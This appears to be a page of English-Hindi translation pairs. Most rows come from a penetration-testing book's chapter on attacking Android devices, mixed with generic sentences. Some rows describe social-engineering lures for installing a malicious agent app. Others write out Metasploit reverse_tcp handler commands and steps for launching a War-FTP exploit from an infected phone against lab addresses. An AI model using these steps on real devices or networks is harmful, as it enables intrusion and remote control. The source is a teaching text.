en
stringlengths 4
3.31k
| translation
stringlengths 5
3.49k
| target_lang
stringclasses 10
values | domain
stringclasses 6
values | complexity
stringclasses 3
values |
|---|---|---|---|---|
Mobile devices are now entering the workplace en masse.
|
मोबाइल डिवाइस अब बड़े पैमाने पर कार्यस्थल में प्रवेश कर रहे हैं।
|
hi
|
technical
|
simple
|
Security teams and pentesters must evaluate the security risks of these devices.
|
सुरक्षा टीमों और पेंटेस्टरों को इन उपकरणों के सुरक्षा जोखिमों का मूल्यांकन करना चाहिए।
|
hi
|
technical
|
moderate
|
Developing new mobile attacks and post-exploitation techniques is an ideal place to start with your own security research.
|
नए मोबाइल हमलों और पोस्ट-एक्सप्लॉयटेशन तकनीकों का विकास आपके अपने सुरक्षा अनुसंधान के साथ शुरू करने के लिए एक आदर्श स्थान है।
|
hi
|
technical
|
complex
|
We’ll be discussing a tool I created to help pentesters to assess the security posture of mobile devices, the Smartphone Pentest Framework (SPF).
|
हम एक ऐसे उपकरण पर चर्चा करेंगे जो मैंने पेंटेस्टरों को मोबाइल उपकरणों की सुरक्षा स्थिति का आकलन करने में मदद करने के लिए बनाया है, स्मार्टफोन पेंटेस्ट फ्रेमवर्क (एसपीएफ)।
|
hi
|
technical
|
moderate
|
After working your way through this book, you will be ready to embark on your own infosec journey.
|
इस पुस्तक के माध्यम से काम करने के बाद, आप अपनी खुद की सूचना सुरक्षा यात्रा शुरू करने के लिए तैयार होंगे।
|
hi
|
technical
|
moderate
|
For most of the examples in this chapter, we’ll use the Android platform as a target.
|
इस अध्याय के अधिकांश उदाहरणों के लिए, हम एंड्रॉइड प्लेटफ़ॉर्म को एक लक्ष्य के रूप में उपयोग करेंगे।
|
hi
|
technical
|
simple
|
Mobile technology is a rapidly developing field.
|
मोबाइल तकनीक एक तेजी से विकसित होने वाला क्षेत्र है।
|
hi
|
technical
|
simple
|
They also have their own unique features that add new attack vectors and protocols to the mix.
|
उनके पास अपनी अनूठी विशेषताएं भी हैं जो मिश्रण में नए हमले के वैक्टर और प्रोटोकॉल जोड़ती हैं।
|
hi
|
technical
|
moderate
|
SMS opens up a new social-engineering attack vector.
|
एसएमएस एक नया सोशल-इंजीनियरिंग हमला वेक्टर खोलता है।
|
hi
|
technical
|
simple
|
SMS is an ideal vector for spam and phishing attacks.
|
एसएमएस स्पैम और फ़िशिंग हमलों के लिए एक आदर्श वेक्टर है।
|
hi
|
technical
|
simple
|
Security-awareness training will need to be augmented to include this threat.
|
सुरक्षा जागरूकता प्रशिक्षण को इस खतरे को शामिल करने के लिए बढ़ाने की आवश्यकता होगी।
|
hi
|
technical
|
moderate
|
A user who knows better than to click a random link in a suspicious-looking email may still click a random link in a text message.
|
एक उपयोगकर्ता जो संदिग्ध दिखने वाले ईमेल में एक यादृच्छिक लिंक पर क्लिक करने से बेहतर जानता है, वह अभी भी एक टेक्स्ट संदेश में एक यादृच्छिक लिंक पर क्लिक कर सकता है।
|
hi
|
technical
|
complex
|
Mobile devices bring yet another attack vector to the table: near field communication, or NFC.
|
मोबाइल डिवाइस टेबल पर एक और हमला वेक्टर लाते हैं: निकट क्षेत्र संचार, या एनएफसी।
|
hi
|
technical
|
moderate
|
NFC allows devices to share data by touching or being near each other.
|
एनएफसी उपकरणों को एक-दूसरे को छूकर या पास रहकर डेटा साझा करने की अनुमति देता है।
|
hi
|
technical
|
simple
|
Security awareness training should also teach users to be aware of which NFC tags their device responds to.
|
सुरक्षा जागरूकता प्रशिक्षण को उपयोगकर्ताओं को इस बारे में भी सिखाना चाहिए कि उनका डिवाइस किन एनएफसी टैग का जवाब देता है।
|
hi
|
technical
|
moderate
|
QR codes can embed URLs, send data to an application on a mobile device, and so on.
|
क्यूआर कोड यूआरएल एम्बेड कर सकते हैं, मोबाइल डिवाइस पर एक एप्लिकेशन को डेटा भेज सकते हैं, और इसी तरह।
|
hi
|
technical
|
moderate
|
That QR code on a store window doesn’t have to point to the store’s website.
|
स्टोर की खिड़की पर वह क्यूआर कोड स्टोर की वेबसाइट पर इंगित करने के लिए बाध्य नहीं है।
|
hi
|
technical
|
moderate
|
Malicious QR code attacks have occurred in the wild.
|
दुर्भावनापूर्ण क्यूआर कोड हमले जंगली में हुए हैं।
|
hi
|
technical
|
simple
|
Enough talk; let’s turn our attention to actually attacking mobile devices with the help of SPF.
|
बहुत हो गई बातें; आइए अब हम एसपीएफ की मदद से वास्तव में मोबाइल उपकरणों पर हमला करने पर ध्यान दें।
|
hi
|
technical
|
moderate
|
SPF is still under active development and its feature set changes rapidly.
|
एसपीएफ अभी भी सक्रिय विकास के अधीन है और इसकी सुविधा सेट तेजी से बदलती है।
|
hi
|
technical
|
simple
|
Various USSD tags offer all sorts of functionality.
|
विभिन्न यूएसएसडी टैग सभी प्रकार की कार्यक्षमता प्रदान करते हैं।
|
hi
|
technical
|
simple
|
Our example will use a more innocuous payload than the one described previously.
|
हमारा उदाहरण पहले वर्णित की तुलना में अधिक हानिरहित पेलोड का उपयोग करेगा।
|
hi
|
technical
|
moderate
|
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
|
हमारा उपकरण स्वचालित रूप से एक कोड डायल करेगा ताकि एक पॉप-अप में इसकी विशिष्ट पहचानकर्ता प्रस्तुत की जा सके।
|
hi
|
technical
|
moderate
|
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
|
एसपीएफ में सुरक्षित यूएसएसडी उदाहरण चलाने के लिए, मेनू विकल्प 6 चुनें, फिर 3.) यूएसएसडी वेबपेज अटैक (सुरक्षित) u।
|
hi
|
technical
|
moderate
|
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
|
आपको वेब सर्वर का स्थान, दुर्भावनापूर्ण पृष्ठ का नाम और उस पर टेक्स्ट करने के लिए फ़ोन नंबर पूछा जाएगा।
|
hi
|
technical
|
moderate
|
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
|
इस बार, ब्राउज़र क्रैश होने के बजाय, डायलर ऐप खुलता है, और एक पॉप-अप अधिसूचना दिखाई देती है।
|
hi
|
technical
|
moderate
|
As it turns out, our emulator has no unique identifier, so the number is blank.
|
जैसा कि पता चला है, हमारे एमुलेटर में कोई विशिष्ट पहचानकर्ता नहीं है, इसलिए नंबर खाली है।
|
hi
|
technical
|
moderate
|
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
|
हालांकि यह उदाहरण डिवाइस या उसके डेटा के लिए हानिकारक नहीं था, अन्य यूएसएसडी कोड हो सकते हैं यदि वे डायलर में खोले जाते हैं।
|
hi
|
technical
|
complex
|
Android has a complicated relationship with security updates.
|
एंड्रॉइड का सुरक्षा अपडेट के साथ एक जटिल संबंध है।
|
hi
|
technical
|
moderate
|
The problem is that anyone can make an Android device with its own implementation of the Android OS.
|
समस्या यह है कि कोई भी एंड्रॉइड ओएस के अपने कार्यान्वयन के साथ एक एंड्रॉइड डिवाइस बना सकता है।
|
hi
|
technical
|
complex
|
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android, and the carriers need to push updates to their devices.
|
जब Google पैच के एक सेट के साथ एक नया संस्करण जारी करता है, तो हर मूल उपकरण निर्माता (ओईएम) को परिवर्तनों को एंड्रॉइड के अपने संस्करण में पोर्ट करने की आवश्यकता होती है, और वाहकों को अपने उपकरणों पर अपडेट पुश करने की आवश्यकता होती है।
|
hi
|
technical
|
complex
|
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use, depending on the model and the carrier.
|
हालांकि, अपडेट लगातार वितरित नहीं किए जाते हैं, जिसका अर्थ है कि मॉडल और वाहक के आधार पर, लाखों बिना पैच वाले डिवाइस उपयोग में हो सकते हैं।
|
hi
|
technical
|
complex
|
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
|
अब हम एक भेद्यता पर ध्यान दें जिसे शायद कभी पैच नहीं किया जाएगा: दुर्भावनापूर्ण एप्लिकेशन।
|
hi
|
technical
|
moderate
|
We’ve studied malicious programs intermittently throughout this book.
|
हमने इस पुस्तक में समय-समय पर दुर्भावनापूर्ण कार्यक्रमों का अध्ययन किया है।
|
hi
|
technical
|
moderate
|
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise, much of it in the form of mali- cious applications.
|
मोबाइल उपयोगकर्ता अपने उपकरणों पर ऐप्स डाउनलोड करने के कारणों से अभिभूत हैं, और मोबाइल मैलवेयर बढ़ रहा है, जिसमें से अधिकांश दुर्भावनापूर्ण अनुप्रयोगों के रूप में हैं।
|
hi
|
technical
|
complex
|
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
|
यदि किसी उपयोगकर्ता को दुर्भावनापूर्ण ऐप स्थापित करने के लिए धोखा दिया जा सकता है, तो हमलावर डेटा चुराने, रिमोट कंट्रोल हासिल करने और यहां तक कि अन्य उपकरणों पर हमला करने के लिए एंड्रॉइड के एपीआई का उपयोग कर सकता है।
|
hi
|
technical
|
complex
|
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
|
एंड्रॉइड सुरक्षा मॉडल में, ऐप्स को उन एपीआई का उपयोग करने के लिए अनुमतियों का अनुरोध करना होगा जिनका दुर्भावनापूर्ण तरीके से उपयोग किया जा सकता है, और उपयोगकर्ताओं को स्थापना पर अनुरोधित अनुमतियों को स्वीकार करना होगा।
|
hi
|
technical
|
complex
|
We can use Android permis- sions to control the device without running an additional exploit after the user installs the malicious app.
|
हम उपयोगकर्ता द्वारा दुर्भावनापूर्ण ऐप इंस्टॉल करने के बाद अतिरिक्त शोषण चलाए बिना डिवाइस को नियंत्रित करने के लिए एंड्रॉइड अनुमतियों का उपयोग कर सकते हैं।
|
hi
|
technical
|
complex
|
SPF allows us to create a malicious app with a variety of interesting func- tionality.
|
एसपीएफ हमें विभिन्न प्रकार की दिलचस्प कार्यक्षमता के साथ एक दुर्भावनापूर्ण ऐप बनाने की अनुमति देता है।
|
hi
|
technical
|
moderate
|
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality; our goal here is to trick users into installing the SPF agent on target devices.
|
पहले हमने एसपीएफ को डिवाइस के मोबाइल मॉडेम और अन्य कार्यक्षमता का उपयोग करने की अनुमति देने के लिए अपने पेंटेस्टर-नियंत्रित डिवाइस पर एसपीएफ ऐप का उपयोग किया था; यहां हमारा लक्ष्य उपयोगकर्ताओं को लक्ष्य उपकरणों पर एसपीएफ एजेंट स्थापित करने के लिए धोखा देना है।
|
hi
|
technical
|
complex
|
The company announced a new product launch next month.
|
कंपनी ने अगले महीने एक नए उत्पाद के लॉन्च की घोषणा की।
|
hi
|
news
|
simple
|
Could you please help me with this task?
|
क्या आप कृपया इस कार्य में मेरी मदद कर सकते हैं?
|
hi
|
general
|
simple
|
The weather forecast predicts heavy rain for tomorrow.
|
मौसम विभाग कल भारी बारिश की भविष्यवाणी कर रहा है।
|
hi
|
news
|
simple
|
I am very happy to see you.
|
मुझे आपको देखकर बहुत खुशी हुई।
|
hi
|
general
|
simple
|
The software update is now available for download.
|
सॉफ्टवेयर अपडेट अब डाउनलोड के लिए उपलब्ध है।
|
hi
|
technical
|
simple
|
The government is implementing new policies to boost the economy.
|
सरकार अर्थव्यवस्था को बढ़ावा देने के लिए नई नीतियां लागू कर रही है।
|
hi
|
news
|
moderate
|
Despite the challenges, the team managed to complete the project on time.
|
चुनौतियों के बावजूद, टीम समय पर परियोजना को पूरा करने में सफल रही।
|
hi
|
general
|
moderate
|
The research paper explores the impact of climate change on agriculture.
|
शोध पत्र जलवायु परिवर्तन के कृषि पर प्रभाव की पड़ताल करता है।
|
hi
|
technical
|
moderate
|
The CEO addressed the shareholders during the annual general meeting.
|
सीईओ ने वार्षिक आम बैठक के दौरान शेयरधारकों को संबोधित किया।
|
hi
|
news
|
moderate
|
The complex algorithm requires significant computational resources.
|
जटिल एल्गोरिदम को महत्वपूर्ण कम्प्यूटेशनल संसाधनों की आवश्यकता होती है।
|
hi
|
technical
|
moderate
|
The negotiations between the two countries have reached a critical stage.
|
दोनों देशों के बीच बातचीत एक महत्वपूर्ण चरण में पहुंच गई है।
|
hi
|
news
|
complex
|
The philosophical debate delved into the nature of consciousness and existence.
|
दार्शनिक बहस चेतना और अस्तित्व की प्रकृति में उतर गई।
|
hi
|
general
|
complex
|
The quantum physics experiment yielded unexpected results, challenging existing theories.
|
क्वांटम भौतिकी के प्रयोग ने अप्रत्याशित परिणाम दिए, जो मौजूदा सिद्धांतों को चुनौती देते हैं।
|
hi
|
technical
|
complex
|
The intricate details of the legal proceedings were meticulously examined by the jury.
|
कानूनी कार्यवाही के जटिल विवरणों की जूरी द्वारा सावधानीपूर्वक जांच की गई।
|
hi
|
news
|
complex
|
The economic downturn has significantly impacted the global financial markets.
|
आर्थिक मंदी ने वैश्विक वित्तीय बाजारों को महत्वपूर्ण रूप से प्रभावित किया है।
|
hi
|
news
|
complex
|
The artist's avant-garde approach to painting revolutionized the art world.
|
कलाकार के चित्रकला के प्रति अवांट-गार्डे दृष्टिकोण ने कला जगत में क्रांति ला दी।
|
hi
|
general
|
complex
|
The development of artificial intelligence poses both opportunities and ethical dilemmas.
|
कृत्रिम बुद्धिमत्ता का विकास अवसर और नैतिक दुविधाएँ दोनों प्रस्तुत करता है।
|
hi
|
technical
|
complex
|
The intricate interplay of political factors led to the collapse of the coalition government.
|
राजनीतिक कारकों की जटिल अंतःक्रिया ने गठबंधन सरकार के पतन का नेतृत्व किया।
|
hi
|
news
|
complex
|
The scientific community is divided on the implications of the new discovery.
|
वैज्ञानिक समुदाय नई खोज के निहितार्थों पर विभाजित है।
|
hi
|
technical
|
complex
|
The historical analysis provides a nuanced understanding of the complex socio-political landscape.
|
ऐतिहासिक विश्लेषण जटिल सामाजिक-राजनीतिक परिदृश्य की एक सूक्ष्म समझ प्रदान करता है।
|
hi
|
general
|
complex
|
The book uses a layflat binding.
|
पुस्तक में ले-फ्लैट बाइंडिंग का उपयोग किया गया है।
|
hi
|
technical
|
simple
|
Visit http://nostarch.com/pentesting/ for updates.
|
अपडेट के लिए http://nostarch.com/pentesting/ पर जाएं।
|
hi
|
technical
|
simple
|
The paper is 60# Finch Offset, which is certified by the Forest Stewardship Council (FSC).
|
पेपर 60# फिंच ऑफसेट है, जो वन प्रबंधन परिषद (FSC) द्वारा प्रमाणित है।
|
hi
|
technical
|
moderate
|
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/.
|
आपको इस पुस्तक में उपयोग किए गए संसाधनों के लिंक http://www.nostarch.com/pentesting/ पर मिलेंगे।
|
hi
|
technical
|
moderate
|
Use the password 1stPentestBook?! to open the 7-Zip archive.
|
7-ज़िप संग्रह खोलने के लिए पासवर्ड 1stPentestBook?! का उपयोग करें।
|
hi
|
technical
|
simple
|
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
|
आप विंडोज और लिनक्स प्लेटफार्मों के लिए 7-ज़िप प्रोग्राम http :// www.7-zip.org/download.html पर पा सकते हैं।
|
hi
|
technical
|
moderate
|
Mac users can use Ez7z from http://ez7z .en.softonic .com/mac/.
|
मैक उपयोगकर्ता http://ez7z .en.softonic .com/mac/ से Ez7z का उपयोग कर सकते हैं।
|
hi
|
technical
|
simple
|
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD.
|
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको एक डीवीडी भेजेंगे।
|
hi
|
technical
|
moderate
|
Visit http://www.nostarch.com/pentesting/ for details.
|
विवरण के लिए http://www.nostarch.com/pentesting/ पर जाएं।
|
hi
|
technical
|
simple
|
You’ll find additional resources at Georgia Weidman’s website: http :// bulbsecurity.com/.
|
आपको जॉर्जिया वेइडमैन की वेबसाइट पर अतिरिक्त संसाधन मिलेंगे: http :// bulbsecurity.com/।
|
hi
|
technical
|
moderate
|
Penetration Testing is set in New Baskerville, TheSansMono Condensed, Futura, and Dogma.
|
पेनेट्रेशन टेस्टिंग को न्यू बास्कर्विल, द सैंस मोनो कंडेंस्ड, फ्यूटुरा और डॉग्मा में सेट किया गया है।
|
hi
|
technical
|
moderate
|
The book was printed and bound by Sheridan Books, Inc. in Chelsea, Michigan.
|
पुस्तक को शेरिडन बुक्स, इंक. द्वारा चेल्सी, मिशिगन में मुद्रित और बांधा गया था।
|
hi
|
technical
|
moderate
|
The cover is not actually glued to the book’s spine, and when open, the book lies flat and the spine doesn’t crack.
|
कवर वास्तव में पुस्तक की रीढ़ से चिपका नहीं है, और जब खुला होता है, तो पुस्तक सपाट रहती है और रीढ़ में दरार नहीं पड़ती है।
|
hi
|
technical
|
complex
|
Updates Visit http://nostarch.com/pentesting/ for updates, errata, and other information.
|
अपडेट, अशुद्धिपत्र और अन्य जानकारी के लिए http://nostarch.com/pentesting/ पर जाएं।
|
hi
|
technical
|
moderate
|
phone: 800.420.7240 or 415.863.9900 email: sales@nostarch.com web : w w w.nostarch.com
|
फ़ोन: 800.420.7240 या 415.863.9900 ईमेल: sales@nostarch.com वेब: w w w.nostarch.com
|
hi
|
technical
|
simple
|
Downloading the Software to Build Your Virtual Lab
|
अपने वर्चुअल लैब को बनाने के लिए सॉफ़्टवेयर डाउनलोड करना
|
hi
|
technical
|
simple
|
You’ll find links for the resources used in this book at http://www.nostarch.com/ pentesting/, including the custom web application, the Ubuntu target, and the Kali Linux virtual machine.
|
आपको इस पुस्तक में उपयोग किए गए संसाधनों के लिंक http://www.nostarch.com/pentesting/ पर मिलेंगे, जिसमें कस्टम वेब एप्लिकेशन, उबंटू लक्ष्य और काली लिनक्स वर्चुअल मशीन शामिल हैं।
|
hi
|
technical
|
complex
|
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD containing the files for US $10.
|
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको यूएस $10 में फ़ाइलों वाली एक डीवीडी भेजेंगे।
|
hi
|
technical
|
complex
|
You can find 7-Zip programs for Windows and Linux platforms at http :// www.7-zip.org/download.html.
|
आप विंडोज और लिनक्स प्लेटफार्मों के लिए 7-ज़िप प्रोग्राम http :// www.7-zip.org/download.html पर पा सकते हैं।
|
hi
|
technical
|
moderate
|
If you’re unable to download the files or you’d just like them delivered to your doorstep, we’ll send you a DVD.
|
यदि आप फ़ाइलों को डाउनलोड करने में असमर्थ हैं या आप उन्हें अपने दरवाजे पर मंगवाना चाहते हैं, तो हम आपको एक डीवीडी भेजेंगे।
|
hi
|
technical
|
moderate
|
We can do the same thing for Android as long as we have an ARM cross compiler.
|
हम एंड्रॉइड के लिए भी यही काम कर सकते हैं, जब तक हमारे पास एक एआरएम क्रॉस कंपाइलर है।
|
hi
|
technical
|
moderate
|
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
|
सौभाग्य से, SPF के पास एक है। जैसा कि लिस्टिंग 20-23 में दिखाया गया है, मुख्य मेनू से मोबाइल उपकरणों पर चलाने के लिए कोड संकलित करने के लिए विकल्प 9.) चुनें।
|
hi
|
technical
|
moderate
|
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
|
मोबाइल उपकरणों पर चलाने के लिए कोड संकलित करें 1.) एआरएम एंड्रॉइड के लिए सी कोड संकलित करें spf> 1u एआरएम आधारित एंड्रॉइड उपकरणों पर चलाने के लिए सी कोड संकलित करता है।
|
hi
|
technical
|
moderate
|
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
सी कोड फ़ाइल और आउटपुट फ़ाइलनाम प्रदान करें फ़ाइल संकलित करने के लिए: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv आउटपुट फ़ाइल: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
hi
|
technical
|
complex
|
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
|
चुनें 1.) एआरएम एंड्रॉइड के लिए सी कोड संकलित करें u. आपको संकलित करने के लिए सी फ़ाइल के साथ-साथ संकलित बाइनरी v को कहां रखना है, इसके लिए संकेत दिया जाएगा।
|
hi
|
technical
|
moderate
|
Now we need to download the War-FTP exploit to our infected Android device.
|
अब हमें अपने संक्रमित एंड्रॉइड डिवाइस पर War-FTP एक्सप्लॉइट डाउनलोड करने की आवश्यकता है।
|
hi
|
technical
|
moderate
|
From the agent commands menu, choose option 6 to download a file.
|
एजेंट कमांड मेनू से, एक फ़ाइल डाउनलोड करने के लिए विकल्प 6 चुनें।
|
hi
|
technical
|
simple
|
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
|
आपको डाउनलोड करने के लिए फ़ाइल और डिलीवरी विधि के लिए कहा जाएगा, जैसा कि लिस्टिंग 20-24 में दिखाया गया है।
|
hi
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
|
निष्पादित करने के लिए एक कमांड चुनें या पिछले मेनू पर वापस जाने के लिए 0 spf> 6 फोन पर एक फ़ाइल डाउनलोड करता है।
|
hi
|
technical
|
moderate
|
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
|
फ़ाइल और डिलीवरी विधि (एसएमएस या एचटीटीपी) भरें। डाउनलोड करने के लिए फ़ाइल: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter डिलीवरी विधि (एसएमएस या एचटीटीपी): एचटीटीपी
|
hi
|
technical
|
complex
|
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
|
एक्सप्लॉइट चलाने से पहले, हमें Msfconsole में एक हैंडलर सेट अप करने की आवश्यकता है, जैसा कि लिस्टिंग 20-25 में दिखाया गया है।
|
hi
|
technical
|
moderate
|
Open Msfconsole on Kali, and use the multi/handler module, setting the options to match the payload in the War-FTP exploit.
|
काली पर Msfconsole खोलें, और multi/handler मॉड्यूल का उपयोग करें, वार-एफ़टीपी एक्सप्लॉइट में पेलोड से मेल खाने के लिए विकल्पों को सेट करें।
|
hi
|
technical
|
moderate
|
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
|
msf > multi/handler का उपयोग करें msf exploit(handler) > सेट पेलोड windows/meterpreter/reverse_tcp पेलोड => windows/meterpreter/reverse_tcp
|
hi
|
technical
|
complex
|
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
|
msf exploit(handler) > सेट LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] 192.168.20.9:4444 पर रिवर्स हैंडलर शुरू किया गया [*] पेलोड हैंडलर शुरू हो रहा है...
|
hi
|
technical
|
complex
|
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
|
अंत में, एक्सप्लॉइट चलाने का समय आ गया है। जैसा कि लिस्टिंग 20-26 में दिखाया गया है, एजेंट कमांड मेनू से विकल्प 7.) कमांड निष्पादित करें चुनें; आपको चलाने के लिए कमांड के लिए संकेत दिया जाएगा।
|
hi
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
|
निष्पादित करने के लिए एक कमांड चुनें या पिछले मेनू पर वापस जाने के लिए 0 spf> 7 टर्मिनल में एक कमांड चलाएँ।
|
hi
|
technical
|
moderate
|
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
|
कमांड और डिलीवरी विधि (एसएमएस या एचटीटीपी) भरें। कमांड: warftpmeterpreter 192.168.20.10 21u डाउनलोड किया गया?: हाँv डिलीवरी विधि (एसएमएस या एचटीटीपी): एचटीटीपी
|
hi
|
technical
|
complex
|
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
|
SPF को पूरा कमांड बताएं, जिसमें तर्क u शामिल हैं। इस मामले में, हमें एक्सप्लॉइट को आईपी पता और हमला करने के लिए पोर्ट बताने की आवश्यकता है।
|
hi
|
technical
|
moderate
|
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
|
SPF पूछता है कि क्या बाइनरी डाउनलोड की गई थी। यदि इसे SPF के माध्यम से डाउनलोड किया गया था, तो यह एजेंट की फ़ाइलों की निर्देशिका में होगा, और SPF को वहां से इसे चलाने के लिए जानने की आवश्यकता होगी।
|
hi
|
technical
|
moderate
|
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
|
हमारे मामले में, हम हाँ v का उत्तर देते हैं, फिर हमेशा की तरह डिलीवरी विधि दर्ज करते हैं। अपने मेटास्प्लाइट श्रोता को देखें। लगभग एक मिनट में आपको एक मीटरप्रेटर प्रॉम्प्ट प्राप्त होना चाहिए जैसे कि अगला दिखाया गया है।
|
hi
|
technical
|
moderate
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.